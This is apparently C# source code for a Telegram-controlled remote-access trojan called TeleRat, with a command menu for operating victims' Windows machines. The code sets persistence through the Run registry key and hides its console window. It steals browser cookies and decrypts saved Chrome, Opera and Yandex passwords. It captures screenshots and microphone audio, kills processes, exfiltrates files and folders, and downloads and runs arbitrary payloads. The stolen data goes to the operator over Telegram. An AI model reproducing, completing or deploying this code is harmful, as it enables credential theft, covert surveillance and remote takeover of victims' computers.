public static void SendCommands()
{
string response =
"/open_link|<link> - open some link in browser\n" +
"/download_execute|<link> - download and instant open file\n" +
"/exit - close bot\n/ddos|<ip>|<threads> - in developing" +
"\n/GetCookieFile - get cookies from browsers\n" +
"/GetSystem - get system specs\n" +
"/GetProcess - get tasklist\n" +
"/KillProcess|<process name> - kill process\n" +
"/ls|<path> - get files and folders in <path>\n" +
"To upload update you need to attach update\n " +
"with caption \"/UploadUpdate\" \n" +
"To upload file and open it you need to attach file\n " +
"with caption \"/UploadExecute\"\n" +
"/DownloadFile|<full path to file> - download file\n" +
"/DownloadFolder|<full path to folder> - download files from folder in zip archive\n" +
"/CaptureCam - get snapshot (in developing)\n/TakeScreenShot - take screenshot\n" +
"/GetGooglePasswords - get passwords from google\n" +
"/RecordAudio|<time in secs (5 is default)>\n" +
"/MessageBox|<message>|<caption> - show message box\n" +
"/OpenFile|<full path to file> - open file\n" +
"If you wonna just send a file without execute you can simply send this file without any caption\n" +
"If you are sending audio, photo or video file send it like a file/help - get command list";
TelegramSystem.SendMessage(response);
}
public static void GetSystem()
{
string name = string.Empty;
string VideoProc = string.Empty;
string Capacity = string.Empty;
string procName = string.Empty;
string mac = string.Empty;
string response = string.Empty;
string SysVer = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion", "ProductName", null);
GetMacAddress(out mac);
ManagementObjectSearcher searcher2 = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController");
foreach (ManagementObject queryObj in searcher2.Get())
{
name = queryObj["Caption"].ToString();
VideoProc = string.Format("Семейство: {0}", queryObj["VideoProcessor"]);
Capacity = string.Format("Обьем: {0}", queryObj["AdapterRAM"]);
}
ManagementObjectSearcher mos =
new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Processor");
foreach (ManagementObject mo in mos.Get())
{
procName = mo["Name"].ToString();
}
ComputerInfo CI = new ComputerInfo();
ulong mem = ulong.Parse(CI.TotalPhysicalMemory.ToString());
string ram = Math.Round(Convert.ToDouble(mem / (1024 * 1024) / 1000), 0).ToString();
response += $"System [{GetIp()}] \n";
response += "User name: " + Environment.UserName + "\n";
response += ("OS Version: " + SysVer + "\n");
if (cMain.Is64Bit())
{
response += ("OS Аrchitecture: 64bit\n");
}
else
{
response += ("OS Аrchitecture: 32bit");
}
response += ("Local drives: ");
foreach (var loc in Environment.GetLogicalDrives())
{
response += (loc + " ");
}
response += ("\n");
response += ("Core count: " + Environment.ProcessorCount + "\n");
response += ("Processor name: " + procName + "\n");
response += ("Video card: " + name + "\n");
response += ("RAM: " + ram + " GB\n");
response += ("\n");
response += ("Local IP: " + GetLocalIp() + "\n");
response += ("IP: " + GetIp() + "\n");
response += ("MAC: " + mac + "\n");
TelegramSystem.SendMessage(response);
}
public static void DownloadFile(string path)
{
if (File.Exists(path))
{
TelegramSystem.SendDocument(path, $"DownloadFile [{GetIp()}]");
}
else
{
TelegramSystem.SendMessage($"[File downloader] File doesn't exists.");
}
}
public static void TakeScreenShot()
{
Graphics gr;
Bitmap bmp = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
gr = Graphics.FromImage(bmp);
gr.CopyFromScreen(0, 0, 0, 0, bmp.Size);
bmp.Save("screen.png", ImageFormat.Png);
TelegramSystem.SendDocument("screen.png", "[ScreenShot] Screenshot like document.");
}
private static async void OnTelegramMessage(object sender, Telegram.Bot.Args.MessageEventArgs e)
{
if (e.Message.Document != null && e.Message.Caption.Contains("/UploadUpdate")) // TODO: Сделать разархивирование и запуск файла. Сделать рабочий метод для использования комманды
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName;
Directory.CreateDirectory(path);
var file = await bot.GetFileAsync(e.Message.Document.FileId);
using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create))
{
await bot.DownloadFileAsync(file.FilePath, saveFile);
}
Process.Start(path);
}
else if (e.Message.Document != null && e.Message.Caption == "/UploadExecute")
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\";
Directory.CreateDirectory(path);
path += e.Message.Document.FileName;
var file = await bot.GetFileAsync(e.Message.Document.FileId);
using (var saveFile = new FileStream(path, FileMode.Create))
{
await bot.DownloadFileAsync(file.FilePath, saveFile);
}
try
{
Process.Start(path);
}
catch
{
TelegramSystem.SendMessage($"[ERROR] [{Functions.GetIp()}] Something wrong");
}
}
else if (e.Message.Document != null)
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\BotFiles\\" + e.Message.Document.FileName;
Directory.CreateDirectory(path);
var file = await bot.GetFileAsync(e.Message.Document.FileId);
using (var saveFile = new FileStream(path + "\\" + e.Message.Document.FileName, FileMode.Create))
{
await bot.DownloadFileAsync(file.FilePath, saveFile);
}
}
else
{
cmd command = new cmd(e.Message.Text);
Execute(command);
}
}
public static void GetProcess()
{
string response = $"Task list {GetIp()}\n";
Process prc = new Process();
Process[] processes = Process.GetProcesses();
foreach (var process in processes)
{
response += ("ID: " + process.Id + " Name: " + process.ProcessName.ToLower() + "\n");
}
TelegramSystem.SendMessage(response);
}
public static void KillProcess(string processID) // Закрытие процесса и отправка подтверждения
{
Process prc = new Process();
Process[] processes = Process.GetProcesses();
foreach (var process in processes)
{
if (process.ProcessName.ToLower() == processID.ToLower())
{
TelegramSystem.SendMessage($"[Process killer] Process [{processID}] has been killed!");
process.Kill();
}
}
}
public static void GetCookieAndLoginData()
{
string directory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Bot";
Directory.CreateDirectory(directory);
KillBrowsers();
string username = Environment.UserName;
string[] pathes =
{
$"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies",
$"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies",
$"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies",
$"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Cookies",
$"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\INetCookies",
$"C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\Cookies"
};
int counter = 0;
foreach (var path in pathes)
{
Console.WriteLine(path);
Console.WriteLine(File.Exists(path));
if (File.Exists(path))
{
Console.WriteLine(File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"));
if (File.Exists(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}"))
{
File.Delete(directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
}
else
{
File.Copy(path, directory + "\\" + Path.GetFileNameWithoutExtension(path) + $" {config.browsers[counter]}");
}
}
counter++;
}
string folder = ZipFolder(directory);
TelegramSystem.SendDocument(folder, $"[COOKIES] Got {counter} cookies [{GetIp()}]");
}
public static string ZipFile(string path)
{
string pathToSave = Environment.CurrentDirectory + $"\\{Path.GetFileNameWithoutExtension(path)}" + ".zip";
try
{
using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile())
{
DirectoryInfo di = new DirectoryInfo(path);
zip.AddFile(path);
zip.Save(pathToSave);
}
}
catch (Exception ex)
{
TelegramSystem.SendMessage($"[ZipFile ERROR] {ex.Message}");
}
return(pathToSave);
}
public static string ZipFolder(string folder)
{
string pathToSave = config.appData;
try
{
using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile())
{
DirectoryInfo di = new DirectoryInfo(folder);
pathToSave += "\\" + di.Name + ".zip";
zip.AddDirectory(folder);
zip.Save(pathToSave);
}
}
catch (Exception ex)
{
TelegramSystem.SendMessage($"[ZipFolder ERROR] {ex.Message}");
}
return(pathToSave);
}
public static void GetFiles(string path)
{
string response = $"Files and directories [{GetIp()}] [\"D:\\BotFiles\\ \"]: \n";
try
{
DirectoryInfo dir = new DirectoryInfo(path);
foreach (var item in dir.GetDirectories())
{
response += item.Name + "\n";
}
foreach (var item in dir.GetFiles())
{
response += item.Name + "\n";
}
TelegramSystem.SendMessage(response);
}
catch (Exception ex) { TelegramSystem.SendMessage($"[ERROR] [{GetIp()}] {ex.Message}"); }
}
public static void RecordAudio(string time = "5")
{
int delay;
if (!int.TryParse(time, out delay))
{
TelegramSystem.SendMessage("[RecordAudio ERROR] Write correct seconds.");
}
else
{
delay += 1;
string path = config.appData + "\\BotFiles\\waveS.wav";
try
{
WaveInEvent waveSource = new WaveInEvent();
//waveSource.DeviceNumber = 0;
waveSource.WaveFormat = new WaveFormat(44100, 1);
waveSource.DataAvailable += new EventHandler <WaveInEventArgs>(waveSource_DataAvailable);
string tempFile = path;
waveFile = new WaveFileWriter(tempFile, waveSource.WaveFormat);
waveSource.StartRecording();
Thread.Sleep(delay * 1000);
try
{
waveSource.StopRecording();
waveFile.Dispose();
TelegramSystem.SendDocument(path, $"[RecordAudio {GetIp()}]");
}
catch (Exception ex) { TelegramSystem.SendMessage($"[RecordAudio ERROR] {ex.Message}"); }
}
catch (Exception ex)
{
TelegramSystem.SendMessage($"[RecordSound ERROR] {ex.Message}");
}
}
}
static void Main(string[] args)
{
Microsoft.Win32.RegistryKey Key =
Microsoft.Win32.Registry.CurrentUser.OpenSubKey(
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", true);
//добавляем первый параметр - название ключа
// Второй параметр - это путь к
// исполняемому файлу нашей программы.
Key.SetValue(config.currProc, "D:\\BotFiles\\TeleRat.exe");
Key.Close();
TelegramSystem.SendMessage($"Bot [{IP}] is online");
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
signalHandler += HandleConsoleSignal;
ConsoleHelper.SetSignalHandler(signalHandler, true);
bot = new TelegramBotClient(Token);
bot.OnMessage += OnTelegramMessage;
bot.StartReceiving();
Console.ReadKey();
}
static void Execute(cmd CMD)
{
string text = string.Empty;
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt"))
{
StreamReader reader = new StreamReader(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
text = reader.ReadToEnd();
reader.Close();
}
else
{
StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
Writer.AutoFlush = true;
Writer.Close();
}
if (text == CMD.ComType + "|" + CMD.ComContent)
{
}
else
{
switch (CMD.ComType)
{
case "/open_link":
if (CMD.ComContent == null)
{
TelegramSystem.SendMessage("Usage - /open_link|<link> (without <>)");
}
else
{
Functions.OpenLink(CMD.ComContent);
}
break;
case "/download_execute":
if (CMD.ComContent == null)
{
TelegramSystem.SendMessage("Usage - /download_execute|<link> (without <>)");
}
else
{
Functions.DownloadExecute(CMD.ComContent);
}
break;
case "/exit":
Environment.Exit(0);
break;
case "/ddos":
break;
case "/GetCookieFile":
Functions.GetCookieAndLoginData();
break;
case "/GetSystem":
Functions.GetSystem();
break;
case "/GetProcess":
Functions.GetProcess();
break;
case "/MessageBox":
if (CMD.ComContent == null || CMD.ComThreads == null)
{
TelegramSystem.SendMessage("Usage - /MessageBox|<message>|<caption> (without <>)");
}
else
{
Functions.ShowMessageBox(CMD.ComContent, CMD.ComThreads);
}
break;
case "/KillProcess":
if (CMD.ComContent == null)
{
TelegramSystem.SendMessage("Usage - /KillProcess|<process name> (without <>)");
}
else
{
Functions.KillProcess(CMD.ComContent);
}
break;
case "/ls":
if (CMD.ComContent == null)
{
Functions.GetFiles("D:\\BotFiles\\");
}
else
{
Functions.GetFiles(CMD.ComContent);
}
break;
case "/DownloadFile":
if (CMD.ComContent == null)
{
TelegramSystem.SendMessage("Usage - /DownloadFile|<full path to file> (without <>)");
}
else
{
Functions.DownloadFile(CMD.ComContent);
}
break;
case "/CaptureCam":
//Functions.CaptureCam(); // TODO: Snapshot с WebCam
break;
case "/TakeScreenShot":
Functions.TakeScreenShot();
break;
case "/GetGooglePasswords":
Functions.GetGooglePasswords(); // TODO: Архивирование файлов в .zip архив
break;
case "/ping":
TelegramSystem.SendMessage($"[Ping] [{Functions.GetIp()}] I'm up");
break;
case "/OpenFile":
if (CMD.ComContent == null)
{
TelegramSystem.SendMessage("Usage - /OpenFile|<full path to file> (without <>)");
}
else
{
Process.Start(CMD.ComContent);
}
break;
case "/DownloadFolder":
if (CMD.ComContent == null)
{
TelegramSystem.SendMessage("Usage - /DownloadFolder|<full path to folder> (without <>)");
}
else
{
Functions.DownloadFolder(CMD.ComContent);
}
break;
case "/help":
Functions.SendCommands();
break;
case "/RecordAudio":
if (CMD.ComContent != null)
{
Functions.RecordAudio(CMD.ComContent);
}
else
{
Functions.RecordAudio();
}
break;
default:
int i = 1;
foreach (var command in commandList)
{
if (CMD.ComType.Contains(command))
{
i = 0;
}
}
if (i != 0)
{
Functions.SendCommands();
}
break;
}
StreamWriter Writer = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "lastCMD.txt");
Writer.AutoFlush = true;
Writer.Write(CMD.ComType + "|" + CMD.ComContent);
Writer.Close();
}
}
private static void HandleConsoleSignal(ConsoleSignal consoleSignal, int returnedValue)
{
TelegramSystem.SendMessage($"Bot [{IP}] is offline");
Thread.Sleep(750);
}
public static void GetGooglePasswords()
{
string username = Environment.UserName;
string[] pathes = { $"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
$"C:\\Users\\{username}\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data",
$"C:\\Users\\{username}\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 1\\Login Data",
$"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data",
$"C:\\Users\\{username}\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker" };
KillBrowsers();
try
{
int counter = 0;
foreach (var db_way in pathes)
{
if (File.Exists(db_way))
{
Directory.CreateDirectory($"{config.appData}\\BotFiles\\passes");
string filename = $"{config.appData}\\BotFiles\\passes\\pass {config.passes[counter]}.txt";
StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8);
string db_field = "logins";
byte[] entropy = null;
string description;
string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
DataTable DB = new DataTable();
string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
{
SQLiteCommand command = new SQLiteCommand(sql, connect);
SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
adapter.Fill(DB);
int rows = DB.Rows.Count;
for (int i = 0; i < rows; i++)
{
byte[] byteArray = (byte[])DB.Rows[i][5];
byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
string password = new UTF8Encoding(true).GetString(decrypted);
if (password == string.Empty && DB.Rows[i][3].ToString().Trim() == string.Empty)
{
continue;
}
else
{
Writer.Write(i + 1 + ") "); // Here we print order number of our trinity "site-login-password"
Writer.WriteLine($"URL: [{DB.Rows[i][1]}]"); // site URL
Writer.WriteLine($"Login: [{DB.Rows[i][3]}]"); // login
Writer.WriteLine($"Password: [{password}]");
Writer.WriteLine();
}
}
Writer.Close();
}
}
counter++;
}
string folder = ZipFolder($"{config.appData}\\BotFiles\\passes");
TelegramSystem.SendDocument(folder, "[Passwords] Well done!");
}
catch (Exception ex)
{
TelegramSystem.SendMessage($"[Passwords] {ex.Message}");
}
}
public static void DownloadFolder(string path)
{
string zip = ZipFolder(path);
TelegramSystem.SendDocument(zip);
}
